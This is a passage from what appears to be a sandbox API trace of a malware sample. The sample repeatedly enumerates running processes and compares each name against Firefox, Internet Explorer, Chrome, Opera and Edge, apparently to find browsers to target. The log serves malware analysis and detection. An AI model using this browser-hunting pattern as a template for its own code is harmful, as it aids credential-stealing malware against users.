(lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0191.967] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0191.967] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.967] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0191.967] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0191.967] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0191.967] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0191.967] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="opera.exe") returned -1 [0191.967] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.967] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0191.968] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0191.968] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0191.968] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0191.968] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="opera.exe") returned -1 [0191.968] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.968] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0191.968] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0191.969] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0191.969] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0191.969] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="opera.exe") returned 1 [0191.969] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.969] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0191.969] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0191.969] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0191.969] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0191.969] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="opera.exe") returned -1 [0191.969] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.969] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0191.970] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0191.970] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0191.970] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0191.970] lstrcmpiA (lpString1="population openings.exe", lpString2="opera.exe") returned 1 [0191.970] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.970] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.970] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0191.970] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0191.970] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0191.970] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0191.970] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.971] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.971] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.971] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.971] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.971] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.971] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.971] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0191.972] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0191.972] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0191.972] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0191.972] lstrcmpiA (lpString1="sppsvc.exe", lpString2="opera.exe") returned 1 [0191.972] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.972] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.972] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.972] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.972] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.972] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.972] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.972] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0191.973] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0191.973] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0191.973] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0191.973] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0191.973] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.973] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0191.974] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0191.974] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0191.974] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0191.974] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0191.974] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.974] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.974] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0191.974] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0191.974] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0191.974] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0191.974] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.974] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0191.975] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0191.975] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0191.975] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0191.975] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0191.975] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.975] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0191.975] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0191.975] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0191.975] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0191.975] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0191.975] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.975] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.976] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0191.976] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0191.976] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0191.976] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0191.976] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.976] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.977] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0191.977] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.977] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0191.978] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0191.978] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0191.978] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0191.978] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0191.978] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0191.978] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0191.978] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0191.978] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0191.978] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0191.978] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0191.978] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0191.978] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0191.979] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="firefox.exe") returned 1 [0191.979] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="iexplore.exe") returned 1 [0191.979] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="chrome.exe") returned 1 [0191.979] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="opera.exe") returned 1 [0191.979] lstrcmpiA (lpString1="WMIADAP.exe", lpString2="microsoftedgecp.exe") returned 1 [0191.979] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0191.980] CloseHandle (hObject=0xe8) returned 1 [0191.980] Sleep (dwMilliseconds=0x3e8) [0193.016] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0193.018] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0193.019] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0193.019] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0193.019] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0193.019] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0193.019] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0193.019] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0193.019] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0193.019] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0193.019] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0193.020] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0193.020] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0193.020] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0193.020] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0193.020] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0193.020] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0193.020] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0193.020] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.020] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.021] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0193.021] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0193.021] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0193.021] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0193.021] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.021] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0193.021] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0193.021] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0193.021] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0193.021] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0193.021] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.021] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0193.022] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0193.022] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0193.022] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0193.022] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0193.022] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.022] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0193.022] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0193.022] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0193.022] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0193.022] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0193.023] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.023] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0193.023] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0193.023] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0193.023] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0193.023] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0193.023] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.023] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0193.024] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0193.024] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0193.024] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0193.024] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0193.024] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.024] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0193.024] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0193.024] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0193.024] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0193.024] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0193.024] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0193.024] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.025] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.025] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.026] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.026] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.026] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.026] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.026] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.026] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0193.027] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0193.027] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0193.028] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0193.028] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0193.028] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0193.028] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0193.028] lstrcmpiA 